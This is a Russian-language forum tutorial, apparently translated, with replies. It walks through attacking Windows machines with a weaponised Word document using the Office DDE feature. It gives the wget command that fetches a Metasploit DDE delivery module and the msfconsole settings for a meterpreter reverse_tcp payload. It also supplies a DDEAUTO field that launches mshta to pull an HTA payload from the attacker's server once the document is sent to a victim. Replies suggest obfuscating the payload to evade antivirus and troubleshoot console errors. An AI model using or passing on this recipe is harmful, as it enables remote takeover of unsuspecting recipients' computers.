Статья Использование Windows при помощи DDE эксплойта Microsoft Office (MACROLESS)

DDE-Exploit.jpg




DDE экплойт также известен как динамический обмен данными, позволяет передавать данные между приложениями без какого-либо взаимодействия с пользователем. Хакеры использовали этот метод для запуска вредоносных скриптов с целью взлома системы.

Об этом в Microsoft сообщали такие службы, как Sensepost, Etienne Stalmans, и Saif El-Sherei, но он не был исправлен, поскольку многие приложения используют протокол DDE. Этот эксплойт не требует включения макрофункции.

Необходимые условия – DDE exploit
  • Машина использующая операционную систему Windows
  • Microsoft Office (любая версия)
  • KALI LINUX
Мы вынуждены будем импортировать Metasploit эксплойт.
Загрузите его из GitHub с помощью командного терминала.


Код: 
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb

Отправьте скрипт в местоположение Metasploit
Код: 
mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/

Screen-Shot-2017-11-09-at-5.50.40-PM.png



Теперь наберите msfconsole на терминале, который запускает Metasploit framework, а затем наберите reload_all, чтобы загрузить модули.


Screen-Shot-2017-11-09-at-5.56.08-PM.png


Этот эксплойт использует функцию dde, чтобы поставить hta payload. А теперь наберите

Код: 
use exploit/windows/dde_delivery

затем установите хост сервера, используя следующую команду:

Код: 
set SRVHOST 192.168.177.141

мы должны установить прослушиватель payload. Не используйте порт 8080, поскольку порт сервера установлен по умолчанию на 8080.
  1. установите PAYLOAD windows/meterpreter/reverse_tcp
  2. установите LHOST 192.168.177.141
  3. установите LPORT 6708
  4. эксплойт
Screen-Shot-2017-11-09-at-6.29.07-PM.png



Теперь вставьте код в любой документ word. Мы использовали полностью обновленный office 365 pro plus. Разместите формулу, и у вас должно быть небольшое поле ошибки в документе, а затем щелкните правой кнопкой мыши по коду. Вставьте команду в документ между цветными скобками. Сохраните документ.

Код: 
{DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe “http://192.168.177.141:8080/mVg3YDU3gVQ”}

После отправки документа получателю у вас откроется сессия измерителя.

Отказ от ответственности

Эта статья предназначена только для образовательных целей. Любые действия и/или деятельность, связанные с материалом, содержащимся на этом веб-сайте, будут рассматриваться исключительно в зоне действия вашей ответственности. Нелегальное использование информации на этом веб-сайте может привести к уголовным обвинениям, выдвинутым против соответствующих лиц. Авторы и
Ссылка скрыта от гостей
не будут нести ответственность в случае возбуждения уголовного обвинения против любых лиц, злоупотребляющих информацией на этом веб-сайте, с целью нарушения закона.


Источник:
Ссылка скрыта от гостей
 
  • Нравится
Реакции: explorer_traveler, ranon, Mitistofel и ещё 9
Нажмите, чтобы раскрыть...
Nice! Ещё можно его обфусцировать до фуда, но это уже другая история!))
 
  • Нравится
Реакции: explorer_traveler
Ребята извините за глупый вопрос я просто новичок в этом деле, но желания горит учится) Скажите если на документе .doc этот код куда вставлять?
 
народ, макросы это совсем другой вид уязвимости..По dde если система с обновлениями, то ничего не получится. плюс антивирусы палят безбожно.
 
  • Нравится
Реакции: Underwood и Tihon49
kot-gor сказал(а):
народ, макросы это совсем другой вид уязвимости..По dde если система с обновлениями, то ничего не получится. плюс антивирусы палят безбожно.
Нажмите, чтобы раскрыть...
После этих слов, мне этот метод на много меньше нравится )
 
  • Нравится
Реакции: Pablo Garcia
А для чего нужен SRVHOST? Хотел через ngrok попробовать, но как я думаю через ngrok не выйдет?
 
Запускаю в Ubuntu
Подскажите что не так?
Код: 
msf exploit(windows/dde_delivery) > exploit
[-] Handler failed to bind to 192.168.177.141:6708:-  -
[*] Started reverse TCP handler on 0.0.0.0:6708
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (192.168.177.141:8080).

Такие опции
Код: 
msf exploit(windows/dde_delivery) > show options

Module options (exploit/windows/dde_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.177.141  yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.177.141  yes       The listen address (an interface may be specified)
   LPORT     6708             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic
 
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ